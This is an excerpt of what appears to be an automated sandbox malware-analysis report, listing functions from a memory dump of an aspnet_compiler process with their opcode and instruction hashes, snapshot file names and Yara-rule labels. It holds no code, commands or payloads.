                                                                                                        • Opcode Fuzzy Hash: f482f873529447103f6f7a09c7f6a8918239380f1a6f39fb4aa442bab694f03a
                                                                                                        • Instruction Fuzzy Hash: 08F0E270A1024DAFDB04EFB9E959EAEB7F4FF14704F04405CA901EB291EA74DA00CB54
                                                                                                        Function 017BC5ED Relevance: .0, Instructions: 31COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 95d473805923455f27c54623a932e3257905a4a3bfed74900db6e43ae3523215
                                                                                                        • Instruction ID: 8536573fbffd8c229ef50053f07848f66675296924e27a6b927c919b1e9b5dd2
                                                                                                        • Opcode Fuzzy Hash: 95d473805923455f27c54623a932e3257905a4a3bfed74900db6e43ae3523215
                                                                                                        • Instruction Fuzzy Hash: 65F0E2716156919FE723971CC1C8F91FBD49F817B9F08E865D806C7512C360E880CA51
                                                                                                        Function 018551CB Relevance: .0, Instructions: 30COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ea98d84ece793b9fd9f2f027d7b8e60eb4ae4b14fbcb2e1c6462fff83912d491
                                                                                                        • Instruction ID: 358103a6b1edb2729197c85c5b1169d0987aa77342eb585e7f7e3c194adf58c9
                                                                                                        • Opcode Fuzzy Hash: ea98d84ece793b9fd9f2f027d7b8e60eb4ae4b14fbcb2e1c6462fff83912d491
                                                                                                        • Instruction Fuzzy Hash: A9F08270A1024DABDB14EBB8D919EAEB7F4FF04708F040059B901EB2D4EB74EA00CB54
                                                                                                        Function 01855341 Relevance: .0, Instructions: 30COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 393e1fe24514cb2da37ad6667074ee425cde291c1eb63448aa7201c088799e67
                                                                                                        • Instruction ID: b373595a37f570dc0740b13b180130c0a8f367463e6c76a18c95e5f6c707b7a1
                                                                                                        • Opcode Fuzzy Hash: 393e1fe24514cb2da37ad6667074ee425cde291c1eb63448aa7201c088799e67
                                                                                                        • Instruction Fuzzy Hash: 1FF02770A10209ABCB04DBB8D859EDEB7F4EF0A708F10005CE902EB2D1EA34DA048714
                                                                                                        Function 017B7208 Relevance: .0, Instructions: 30COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3f3394d59e7b6c687abc4315b54aba1bcc4aa91866d5f0eada4eec095b8cbe37
                                                                                                        • Instruction ID: 50bf97b3e3d7c5c376511c9e9445a00db55ba3e21fc9f9e1a6f432f9e9b2e504
                                                                                                        • Opcode Fuzzy Hash: 3f3394d59e7b6c687abc4315b54aba1bcc4aa91866d5f0eada4eec095b8cbe37
                                                                                                        • Instruction Fuzzy Hash: ACF02771919685AFD723E31CC0DCB13F7D49B00730F354468DA068BB12C338C880C250
                                                                                                        Function 01855227 Relevance: .0, Instructions: 30COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 79221f5c525346f6f38ea3fd63d11ead7c7c0a5c00e34005eaacb60340c96a67
                                                                                                        • Instruction ID: a6deeb7ccc395f9f382851d8d013e377b6ac5b07aa3626a095e30ddf011784dd
                                                                                                        • Opcode Fuzzy Hash: 79221f5c525346f6f38ea3fd63d11ead7c7c0a5c00e34005eaacb60340c96a67
                                                                                                        • Instruction Fuzzy Hash: 01F0A770A14249ABDB14EBB8E959EAEB7F4FF14704F44005CB901EB2D5EA74DA00C754
                                                                                                        Function 018554DB Relevance: .0, Instructions: 30COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 075c6e3ead399b95701038d6c14f1d1a1673bf03e3e9006efbcf81487e2d6693
                                                                                                        • Instruction ID: 2b3f390dfb63aa03ca62af59d6f1914c9bd2ab58c3f4d5979ae9696c0a489328
                                                                                                        • Opcode Fuzzy Hash: 075c6e3ead399b95701038d6c14f1d1a1673bf03e3e9006efbcf81487e2d6693
                                                                                                        • Instruction Fuzzy Hash: DBF08270A10249ABDB04EBB9D559E9EBBF5EF08708F540058B941EB284EA34DA408714
                                                                                                        Function 0185547F Relevance: .0, Instructions: 30COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 161c3cc62b1a7b983ea704c665a89b3bc934c6822c9b533167f756414524b268
                                                                                                        • Instruction ID: 8e473b95f5a24bb0d14d63141d65c2f089d9be1912cba55ab78c7f2ee80f964c
                                                                                                        • Opcode Fuzzy Hash: 161c3cc62b1a7b983ea704c665a89b3bc934c6822c9b533167f756414524b268
                                                                                                        • Instruction Fuzzy Hash: B7F0A770B01249ABDF14DBB9D599E9EBBF4EF08704F144058EA01EB3C4EA34DA40C754
                                                                                                        Function 017B55C0 Relevance: .0, Instructions: 28COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                                                                        • Instruction ID: f69e9c0022da3a8361b6c3ba663ec546c88ef9795e0067ece0ae1e28ff00d2ca
                                                                                                        • Opcode Fuzzy Hash: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                                                                        • Instruction Fuzzy Hash: 84E0ED33100614ABC7216E1AE804F52FB6AFFA0BB1F208229A168975D08B70A811CAD4
                                                                                                        Function 017825E0 Relevance: .0, Instructions: 23COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: ace1f67034e53a642e855604f650f27f749a8174ad27c5ce000bc158867d2c43
                                                                                                        • Instruction ID: e4fb448a4121bb5e6c267afa5673c77ed1e4af3a1944cfe53b11aa4854a2078a
                                                                                                        • Opcode Fuzzy Hash: ace1f67034e53a642e855604f650f27f749a8174ad27c5ce000bc158867d2c43
                                                                                                        • Instruction Fuzzy Hash: 5EE0D8721009949BC721FF29DD09F8BBBDAEF60764F114519F11557195CB30AD10C7C8
                                                                                                        Function 0183B3D0 Relevance: .0, Instructions: 21COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                                                        • Instruction ID: 210b203ec8863f588265a2a4fee69c7d331bf37d841a6b6c526a8f8ed63298f4
                                                                                                        • Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                                                        • Instruction Fuzzy Hash: 4FE0C232284619BBDF232A54DC00F69BB55EB907A0F104031FB08AA690C671AE91D6D4
                                                                                                        Function 0177823B Relevance: .0, Instructions: 21COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                        • Instruction ID: 8e0ceb45e55e152937f3e33f30151d18353bd6bb7299ea365f14af599c0c2682
                                                                                                        • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                        • Instruction Fuzzy Hash: F7E0C231108A10EFDF322F26DC08F51F6A1FF54F11F25486DE08A064A98B70AC81CB46
                                                                                                        Function 01782050 Relevance: .0, Instructions: 20COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fc56de76883fefdecd86e9fb67d42250939c531bfbcf683eb793c34583f437fc
                                                                                                        • Instruction ID: 1a0c2d94817be184453e62141e1e56f8b8039bd492a7dcc54806448113c16e35
                                                                                                        • Opcode Fuzzy Hash: fc56de76883fefdecd86e9fb67d42250939c531bfbcf683eb793c34583f437fc
                                                                                                        • Instruction Fuzzy Hash: 98E0C232240890ABC721FB6DED04F4AB79EEFA5360F100121F155876D8CB60ED00C794
                                                                                                        Function 018092BC Relevance: .0, Instructions: 20COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 02385c6093a7c490544ebd1e9411870ee3438635681103ee26e4bf4a3cfdb460
                                                                                                        • Instruction ID: 52207c172dc446a6dd165d5ae22166115932e3da89d8438abf09ade9d4d56bcf
                                                                                                        • Opcode Fuzzy Hash: 02385c6093a7c490544ebd1e9411870ee3438635681103ee26e4bf4a3cfdb460
                                                                                                        • Instruction Fuzzy Hash: BAF0C934651B84CBE72ADF08C5A1B5177B9F785B44F511498D44A8BBA2C73ADA41CF40
                                                                                                        Function 0177B562 Relevance: .0, Instructions: 17COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                                                                        • Instruction ID: f2ceed8f13de3a8b971bab2ed52db4fcf59cec5de7761a30bbe4f3cd14f8e126
                                                                                                        • Opcode Fuzzy Hash: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                                                                        • Instruction Fuzzy Hash: 49D05B31161650AFDB326F25ED09F82BE75AF90B10F150514B105574F48671DD44C690
                                                                                                        Function 017BE59C Relevance: .0, Instructions: 16COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                        • Instruction ID: 81f2aebc05354466127998aad10fdba9ee1824fa19e4da54385d02df2244d8a3
                                                                                                        • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                        • Instruction Fuzzy Hash: A6D0A7321085505BD7329A1CFC04FC373D8BB88720F050459B118C7155C360AC41C644
                                                                                                        Function 0177A0E3 Relevance: .0, Instructions: 15COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                        • Instruction ID: 695ceec90f62cbda803aceb6f52c88cac0d1635636142c7d9d4c0fd709a1f37e
                                                                                                        • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                        • Instruction Fuzzy Hash: C7D0223221307193EF2956657804F6BE915AB81A90F1E006C340AD3800C0048C43C2E0
                                                                                                        Function 017902A0 Relevance: .0, Instructions: 13COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                        • Instruction ID: 1cf7684b38e1a3a40c5943f7a7ac95356fcb65f3dd03d7da5d080b4c2e651424
                                                                                                        • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                        • Instruction Fuzzy Hash: 9CD0C935226E80CFDB1BCB0CC5A4B15B3E8BB48F44F8104D0F402CBB62D62CD994CA00
                                                                                                        Function 0180930B Relevance: .0, Instructions: 12COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                                        • Instruction ID: ff5473354b3d4049d4bbdf4f5ad97b233282a67c020920a02ed373d3a19ea0af
                                                                                                        • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                                        • Instruction Fuzzy Hash: 0BD01735941AC88FE72BCB08C166B507BF4F705B44F866098E04687AE3C27C9A84CB00
                                                                                                        Function 017A0310 Relevance: .0, Instructions: 11COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                        • Instruction ID: b84a7dd96c0a7be432d01dded93acf4433920ba303bec2d596a29d571ef19f9e
                                                                                                        • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                        • Instruction Fuzzy Hash: 55D01236100248EFCB05DF41C890D9AB72AFBD8710F508419FD19076108A31ED62DA50
                                                                                                        Function 017A340D Relevance: .0, Instructions: 10COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                                                                        • Instruction ID: ed686bb73ffacc072c1b7db6cabd3a9b77b0a0e7e22d78c390b1780a9e79c68f
                                                                                                        • Opcode Fuzzy Hash: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                                                                        • Instruction Fuzzy Hash: AFC08C781419816AEF2B5B54C904F38BA50BB41606FC4069CAB44694E2C36898028218
                                                                                                        Function 017C3010 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: efeb7d3a0e1018d047ac8f5e6c35dcc8ba707dfa2bf30a030817e9cafca49e47
                                                                                                        • Instruction ID: 5e20aa95d0b613650d52991e5ab003aff65655aa896c9706a3fb6c211ba1952b
                                                                                                        • Opcode Fuzzy Hash: efeb7d3a0e1018d047ac8f5e6c35dcc8ba707dfa2bf30a030817e9cafca49e47
                                                                                                        • Instruction Fuzzy Hash: 7890022520585842D24072584804B0F812597E1202F95C029E4156564CC9158A555723
                                                                                                        Function 017C3090 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 96da54081910ee62204fdb2a70bf442477ed38dd6701d94ca701c3af23183f03
                                                                                                        • Instruction ID: d9b59c428a563d2ac9d79674d33c75148784043e4c6c5e03255cbedde32d4276
                                                                                                        • Opcode Fuzzy Hash: 96da54081910ee62204fdb2a70bf442477ed38dd6701d94ca701c3af23183f03
                                                                                                        • Instruction Fuzzy Hash: AA90022524541C02D240715884147074026D7D0601F55C021E0024564DC6168B6567B3
                                                                                                        Function 017C4340 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 786fc471d86e05af49cab024bb2c8fcb0bb7b5a0ef145905107c5a9a3aec6f08
                                                                                                        • Instruction ID: 6021deb60b726da1aa97a6fbd035d01bf721c1cf053c10b30b17bd9b8283138a
                                                                                                        • Opcode Fuzzy Hash: 786fc471d86e05af49cab024bb2c8fcb0bb7b5a0ef145905107c5a9a3aec6f08
                                                                                                        • Instruction Fuzzy Hash: 04900235609814129240715848845468025A7E0301B55C021E0424564CCA148B565363
                                                                                                        Function 017C4650 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2caaf720649943f5f9f5b4f0a3416bbc1be03451f7e913e2e795ea2c7a4c71cb
                                                                                                        • Instruction ID: c9e3ec0172dd162e2821a4edd954a9d8d1ac233bed500c635c4145a97dc58da2
                                                                                                        • Opcode Fuzzy Hash: 2caaf720649943f5f9f5b4f0a3416bbc1be03451f7e913e2e795ea2c7a4c71cb
                                                                                                        • Instruction Fuzzy Hash: 3690026560551442424071584804406A025A7E1301395C125E0554570CC6188A55936B
                                                                                                        Function 017C39B0 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 20f5b91a21c98f8ae67977d4e064c5c4a1d2ec28717f70ec50039df2742e41a9
                                                                                                        • Instruction ID: a7b5d9d530897a6680a2a3606fa94ab31967271726e903259f8e461fc6f46407
                                                                                                        • Opcode Fuzzy Hash: 20f5b91a21c98f8ae67977d4e064c5c4a1d2ec28717f70ec50039df2742e41a9
                                                                                                        • Instruction Fuzzy Hash: 2690022524946502D250715C44046168025B7E0201F55C031E08145A4DC5558A556323
                                                                                                        Function 017C2BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2b12e22b8a5646ed9fe0cb1d46f21e521c5dcd9a3b5b04f476d9613a7978a874
                                                                                                        • Instruction ID: 192c19de5cd2e54edb70a410388627d677ecf7e91c8ae0b812837abcfcdf2a92
                                                                                                        • Opcode Fuzzy Hash: 2b12e22b8a5646ed9fe0cb1d46f21e521c5dcd9a3b5b04f476d9613a7978a874
                                                                                                        • Instruction Fuzzy Hash: 5D90023520541C02D2807158440464A402597D1301F95C025E0025664DCA158B5977A3
                                                                                                        Function 017C2BE0 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 660cce620bc2271fddfc51a845d08f4ae0075d5889b2110f785f7431abf29a2e
                                                                                                        • Instruction ID: 4610dadb0a6bc47af0f1764983c6342b0b53d848ce43c0e50ad7c59bd48330e0
                                                                                                        • Opcode Fuzzy Hash: 660cce620bc2271fddfc51a845d08f4ae0075d5889b2110f785f7431abf29a2e
                                                                                                        • Instruction Fuzzy Hash: 6990023520945C42D24071584404A46403597D0305F55C021E00646A4DD6258F55B763
                                                                                                        Function 017C2BA0 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 633c5689deacf99b8dc5173e2f7e23e864e5e9584a7172848b8f404d4d974bd8
                                                                                                        • Instruction ID: 56b29406e9699f1c4448f30ab30839466c51e17d22428c1acaee7cbc2dcc707d
                                                                                                        • Opcode Fuzzy Hash: 633c5689deacf99b8dc5173e2f7e23e864e5e9584a7172848b8f404d4d974bd8
                                                                                                        • Instruction Fuzzy Hash: E790023560941C02D25071584414746402597D0301F55C021E0024664DC7558B5577A3
                                                                                                        Function 017C2B80 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fdff4aab21d703ef09a1adc7bdcd0106ac5fa19aafdb82cf779c87cb59ad6539
                                                                                                        • Instruction ID: 13b0d466baf9f124844056ea453b1789f620dd0088c1e19bc82d76a738db97d6
                                                                                                        • Opcode Fuzzy Hash: fdff4aab21d703ef09a1adc7bdcd0106ac5fa19aafdb82cf779c87cb59ad6539
                                                                                                        • Instruction Fuzzy Hash: 3390023520541C02D20471584804686402597D0301F55C021E6024665ED6658A917233
                                                                                                        Function 017C2AF0 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
